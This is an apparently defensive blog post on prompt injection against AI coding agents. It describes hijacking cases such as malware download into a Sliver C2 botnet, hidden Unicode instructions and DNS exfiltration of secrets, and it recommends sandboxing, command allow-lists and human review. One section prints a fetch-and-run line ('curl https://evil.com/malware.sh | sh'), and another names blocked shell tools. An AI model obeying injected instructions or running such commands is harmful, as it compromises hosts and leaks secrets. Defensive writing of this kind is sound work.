Prompt Injection in AI Agents: Why Your Code Bots Are Vulnerable

Prompt injection can hijack AI coding agents, enabling remote code execution and data exfiltration. Learn practical safeguards for CTOs and engineers.

TL;DR

Published by Brav

Table of Contents

Prompt injection lets an attacker trick an AI coding agent into running malicious commands on your infrastructure.
A single Unicode-hidden payload can make a botnet join Sliver or exfiltrate secrets via DNS.
Agents that click links or render images can leak URLs back to an attacker.
The fix is to treat every LLM output as untrusted code and sandbox it with strict controls.
Human-in-the-loop oversight, downstream security checks, and a tight API whitelist are non-negotiable.

Why This Matters

When I was building an internal automation stack in 2022, I never imagined that the very tools designed to boost developer productivity could become the vector for a remote code execution chain. The reality is that prompt injection attacks on coding agents can elevate a low-privilege LLM to a full-blown attacker, as Claude’s Computer Use demonstrated when it downloaded malware and joined the Sliver C2 botnet [Claude’s Computer Use – malware & botnet]. That single line of injected prompt turned a harmless helper into a command-and-control agent. For a CTO, this means that any unchecked agent can transform a protected network into a playground for attackers.

Core Concepts

Prompt injection is not just a syntactic glitch; it is the new form of social engineering where an attacker manipulates the LLM’s instruction set. A well-crafted prompt can make the agent believe it is executing a legitimate task while silently dropping a shell, modifying a config file, or launching a malicious payload [Prompt injection is a social engineering problem].

The Confused Deputy Problem

Agents are designed to trust the instructions they receive. When an attacker injects a command that appears benign, the agent obeys, acting as a “confused deputy” that inadvertently hands over power to the attacker. This is similar to legacy software that performs privileged actions on behalf of a malicious user when they misrepresent their identity [Confused deputy problem].

Hidden Unicode Injection

Unicode can be abused to hide instructions inside seemingly innocuous text. A single zero-width space or non-printing character can change the meaning of a prompt or code block. Attackers use this to embed shell commands in comments or to trick the agent into executing find-exec chains that can read .env files and exfiltrate secrets over DNS [Hidden Unicode injection embedded instructions in code].

Automatic Tool Invocation Bypass

Many agents offer a “call-tool” API that lets them run external commands. The safety layer often checks only the prompt text, not the resulting tool invocation. If an attacker injects a prompt that forces the agent to call bash -c curl https://evil.com/malware.sh | sh, the agent will happily execute it, bypassing the safety guardrails [Agents that click links trigger malicious downloads].

Remote Code Execution and Data Exfiltration

The combination of prompt injection, tool invocation, and hidden Unicode allows an attacker to achieve RCE on the host machine. Once a shell is granted, an agent can use DNS tunneling (ping, dig, nslookup) to send secrets out, or open a local web server and expose file systems [Prompt injection exfiltrates data via DNS requests].

How to Apply

1. Inventory and Categorize Agents

I start by listing every coding agent, computer-use agent, or tool-invoking bot in the organization. For each one, note its capabilities, the level of sandboxing it offers, and whether it can modify local files. Agents like Claude’s Computer Use, Google Antigravity, and GitHub Copilot fall into different risk buckets.

Agent	Typical Safety Feature	Common Attack Vector	Limitation
Claude’s Computer Use	Tool invocation with user context	Prompt injection to download malware (Sliver C2)	No sandbox, can modify local config
Google Antigravity	Code generation only	Hidden Unicode to embed malicious code	No tool invocation safety
GitHub Copilot	In-editor suggestions	Prompt injection via comments to alter code	No execution context

This table shows that agents with tool-invoking capabilities are the highest priority for hardening.

2. Treat LLM Output as Untrusted Code

Just like any third-party script, never run an LLM’s code block directly. Enforce a sandbox that:

Limits file system access to a read-only mount for the host.
Runs commands with the lowest privileged user account.
Logs every tool invocation with a signature hash.

A simple wrapper can intercept invoke_tool calls, inspect the payload, and reject anything that touches /etc/ or contains suspicious shell metacharacters.

3. Whitelist APIs and Commands

Create an explicit whitelist of commands the agent may execute. Anything outside that set must be flagged. For example, allow only python -m venv, pip install, or git clone but block bash -c, sh, or wget unless explicitly approved. This mitigates the “automatic tool invocation bypass” attack surface.

4. Enable Human-in-the-Loop for Sensitive Actions

When an agent proposes a command that touches secrets or system configuration, surface it to a human operator before execution. A small UI in the CI pipeline or chat interface can display the full command and let an engineer veto it. This layer prevents silent privilege escalation.

5. Monitor DNS and Network Traffic

Install a lightweight DNS logger on the agent’s host. Any outbound DNS queries that contain data patterns (e.g., base64-encoded strings or hex-encoded secrets) should trigger an alert. Combine this with a simple honeypot that listens on an unused port; if the agent opens a web server to expose a local filesystem, the honeypot will detect it.

6. Patch Rapidly and Automate Updates

The vendors that provide these agents often release patches within weeks once a vulnerability is disclosed. Automate your CI pipeline to pull the latest agent version and run a static analysis against known unsafe patterns before deployment. A nightly script can scan the agent code for suspicious constructs and push a “security flag” if any are found.

Pitfalls & Edge Cases

Vendor patch lag: Even if vendors fix vulnerabilities quickly, your internal orchestration may still be using an outdated version. Continuous integration must enforce the latest runtime.
Multi-agent ecosystems: In environments where multiple agents collaborate, a single compromised agent can spread malware to others. Design an inter-agent trust model that isolates untrusted agents.
Hidden Unicode detection: Most text editors strip or warn about zero-width characters, but LLM prompts may bypass this. Integrate a Unicode sanitizer that strips non-printing characters before feeding prompts to the model.
Indirect payloads: Attackers can embed malicious code in a file that the agent later reads (e.g., a code snippet inside a requirements.txt). Validate all external files before feeding them to the agent.

Quick FAQ

Q: How can organizations enforce human-in-the-loop controls in coding agents at scale?
A: Build a lightweight UI that surfaces any command with a privilege-elevating flag to a gatekeeper queue. Use a role-based access system so only senior engineers can approve or reject.

Q: What are the best practices for sandboxing AI agents to prevent remote code execution?
A: Use OS-level containers (Docker, Kata Containers) with read-only mounts, run as a non-privileged user, and enforce an allow-list for system calls.

Q: How can vendors detect and mitigate hidden Unicode injection attacks?
A: Run a pre-processing step that normalizes the prompt, strips non-printing characters, and flags any suspicious Unicode ranges. Vendors can add this to the LLM input pipeline.

Q: What level of security controls should be applied downstream from LLM outputs?
A: All generated code should be subjected to the same static analysis pipeline as internal code: linting, unit tests, and a security scanner (e.g., Bandit for Python).

Q: How can we handle prompt injection when third-party data is involved?
A: Treat any third-party content as untrusted. Run the data through a sanitization layer before including it in prompts, and avoid direct concatenation of external JSON or code.

Q: Are there standardized frameworks for evaluating AI agent security across vendors?
A: Yes, the “AI Agent Security Framework” (AASF) proposed by the Cloud Security Alliance provides a checklist for safety controls, sandboxing, and auditability. Many vendors now publish an AASF compliance report.

Conclusion

Prompt injection in AI agents is not a theoretical risk—it has already manifested in real-world incidents like Claude’s Computer Use hijacking a Sliver botnet. The path from a harmless helper to a full-blown RCE is short: a single prompt, a hidden Unicode character, and an unguarded tool invocation. By treating every LLM output as untrusted, sandboxing the execution environment, enforcing human oversight, and keeping the agent stack up to date, you can stop attackers before they even reach the prompt. As a CTO or security lead, make this a top-line priority and treat AI agent hardening like you would hardening any critical infrastructure.

Glossary

Prompt Injection – Crafting inputs that manipulate an LLM into performing unintended actions.
Confused Deputy – A system that follows a malicious request because it misinterprets the caller’s authority.
Hidden Unicode Injection – Embedding non-printing characters to alter code logic or bypass filters.
Tool Invocation – The capability of an agent to call external commands or APIs.
Sandbox – An isolated environment that restricts file system, network, and privilege access.
Human-in-the-Loop (HITL) – A process where a human verifies or approves actions before they are executed.
DNS Exfiltration – Sending data out of a network by encoding it into DNS queries.
Sliver C2 – A lightweight command-and-control framework used by attackers.
YOLO Mode – An agent configuration that removes safety checks to speed execution.

Last updated: January 10, 2026

Why This Matters